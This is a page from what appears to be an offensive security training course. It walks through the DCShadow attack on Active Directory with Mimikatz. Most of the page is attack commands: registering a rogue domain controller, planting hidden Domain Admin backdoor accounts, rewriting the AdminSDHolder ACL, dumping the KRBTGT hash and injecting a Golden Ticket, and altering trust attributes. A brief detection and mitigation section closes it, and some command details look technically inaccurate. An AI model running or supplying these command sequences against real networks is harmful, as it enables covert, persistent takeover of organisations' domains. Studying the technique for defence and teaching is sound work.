Home > Roadmap > Active Directory Security > Module 5 > DCShadow Attack

DCShadow Attack

Rogue domain controller attacks for persistent domain manipulation.

Expert150 min

Objectives

What is DCShadow?

DCShadow is an advanced attack technique that allows an attacker to register a rogue Domain Controller in the domain and push malicious changes to the Active Directory database, bypassing most security controls and logging mechanisms.

DCShadow Attack Characteristics:

  • Rogue DC registration: Creates a fake Domain Controller
  • Direct database manipulation: Bypasses normal security controls
  • Stealthy operation: Minimal logging and detection
  • Persistent backdoors: Can create long-term persistence

How DCShadow Works

DCShadow operates by:

  1. Registering a rogue Domain Controller in the domain
  2. Creating a fake replication partner relationship
  3. Pushing malicious changes directly to the AD database
  4. Bypassing normal security controls and auditing

Prerequisites for DCShadow Attack

To perform a DCShadow attack, an attacker needs specific permissions and access.

Required Permissions

The following permissions are required for DCShadow attacks:

System Requirements

DCShadow Attack Implementation

Step 1: Prepare the Attack Environment

Set up the environment for DCShadow attack:

# Verify domain admin access
whoami /groups | findstr "Domain Admins"

# Check domain information
nltest /dsgetdc:corp.local

# Verify network connectivity to DCs
ping dc1.corp.local

Step 2: Register Rogue Domain Controller

Register a rogue Domain Controller using Mimikatz:

# Start Mimikatz with DCShadow module
mimikatz # privilege::debug

# Register rogue DC
mimikatz # lsadump::dcshadow /object:CN=TestDC,CN=Computers,DC=corp,DC=local /attribute:servicePrincipalName /value:"HOST/TestDC.corp.local"

# Set up replication
mimikatz # lsadump::dcshadow /push

Step 3: Create Replication Partnership

Establish replication partnership with legitimate DCs:

# Create replication source
mimikatz # lsadump::dcshadow /object:CN=TestDC,CN=Computers,DC=corp,DC=local /attribute:msDS-NCReplicaLocations /value:"CN=NTDS Settings,CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=local"

# Push replication configuration
mimikatz # lsadump::dcshadow /push

Domain Object Manipulation

Once the rogue DC is registered, various domain objects can be manipulated.

1. User Account Manipulation

Modify user accounts to create backdoors:

# Add user to Domain Admins group
mimikatz # lsadump::dcshadow /object:CN=BackdoorUser,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Modify user password
mimikatz # lsadump::dcshadow /object:CN=BackdoorUser,CN=Users,DC=corp,DC=local /attribute:unicodePwd /value:"NewPassword123!"

# Push changes
mimikatz # lsadump::dcshadow /push

2. Group Membership Manipulation

Modify group memberships for privilege escalation:

# Add user to Enterprise Admins
mimikatz # lsadump::dcshadow /object:CN=BackdoorUser,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Enterprise Admins,CN=Users,DC=corp,DC=local"

# Add user to Schema Admins
mimikatz # lsadump::dcshadow /object:CN=BackdoorUser,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Schema Admins,CN=Users,DC=corp,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

3. Service Account Manipulation

Modify service accounts for persistence:

# Create new service account
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:objectClass /value:"user"

# Set service account password
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:unicodePwd /value:"ServicePassword123!"

# Add to Domain Admins
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

Advanced DCShadow Techniques

1. Cross-Domain DCShadow

Perform DCShadow attacks across trusted domains:

# Register rogue DC in trusted domain
mimikatz # lsadump::dcshadow /object:CN=CrossDomainDC,CN=Computers,DC=trusted,DC=local /attribute:servicePrincipalName /value:"HOST/CrossDomainDC.trusted.local"

# Create cross-domain backdoor
mimikatz # lsadump::dcshadow /object:CN=CrossDomainUser,CN=Users,DC=trusted,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=trusted,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

2. Stealth Backdoor Creation

Create stealthy backdoors that are difficult to detect:

# Create hidden user account
mimikatz # lsadump::dcshadow /object:CN=HiddenUser,CN=Users,DC=corp,DC=local /attribute:objectClass /value:"user"
mimikatz # lsadump::dcshadow /object:CN=HiddenUser,CN=Users,DC=corp,DC=local /attribute:unicodePwd /value:"HiddenPassword123!"
mimikatz # lsadump::dcshadow /object:CN=HiddenUser,CN=Users,DC=corp,DC=local /attribute:userAccountControl /value:"66048"

# Add to protected groups
mimikatz # lsadump::dcshadow /object:CN=HiddenUser,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

3. ACL Manipulation

Modify Access Control Lists for persistent access:

# Modify AdminSDHolder ACL
mimikatz # lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=corp,DC=local /attribute:nTSecurityDescriptor /value:"D:AI(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1234567890-1234567890-1234567890-1105)"

# Push ACL changes
mimikatz # lsadump::dcshadow /push

Persistent Backdoor Installation

DCShadow can be used to install various types of persistent backdoors.

1. Golden Ticket Backdoor

Create Golden Ticket using DCShadow-extracted KRBTGT hash:

# First extract KRBTGT hash using DCSync
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

# Create Golden Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:hash /user:backdoor /ticket:golden.kirbi

# Inject Golden Ticket
mimikatz # kerberos::ptt golden.kirbi

2. Service Account Backdoor

Create service accounts with high privileges:

# Create service account with SPN
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:servicePrincipalName /value:"MSSQLSvc/dbserver.corp.local:1433"

# Set strong password
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:unicodePwd /value:"StrongPassword123!"

# Add to privileged groups
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

3. Trust Relationship Backdoor

Modify trust relationships for cross-domain access:

# Modify inter-domain trust
mimikatz # lsadump::dcshadow /object:CN=trusted.local,CN=System,DC=corp,DC=local /attribute:trustDirection /value:"2"

# Add SID filtering bypass
mimikatz # lsadump::dcshadow /object:CN=trusted.local,CN=System,DC=corp,DC=local /attribute:securityIdentifier /value:"S-1-5-21-0987654321-0987654321-0987654321"

# Push changes
mimikatz # lsadump::dcshadow /push

DCShadow Detection and Mitigation

Detection Methods

Detecting DCShadow attacks is challenging but possible through various methods.

1. Event Log Monitoring

# Monitor for DC registration events
Get-WinEvent -FilterHashtable @{LogName='System'; ID=1074} | Where-Object {$_.Message -match "Domain Controller"}

# Monitor for replication events
Get-WinEvent -FilterHashtable @{LogName='Directory Service'; ID=1988} | Where-Object {$_.Message -match "Replication"}

# Monitor for object creation events
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5137} | Where-Object {$_.Message -match "Created"}

2. Network Monitoring

3. Directory Monitoring

Mitigation Strategies

1. Restrict DC Registration

# Remove unnecessary DC registration rights
dsacls "CN=Computers,DC=corp,DC=local" /R "Everyone"

# Restrict computer account creation
dsacls "CN=Computers,DC=corp,DC=local" /G "DOMAIN\AuthorizedUsers:CCDC;computer"

2. Implement Monitoring

3. Network Segmentation

4. Regular Auditing

← Previous Next: ADCS Certificate Attacks →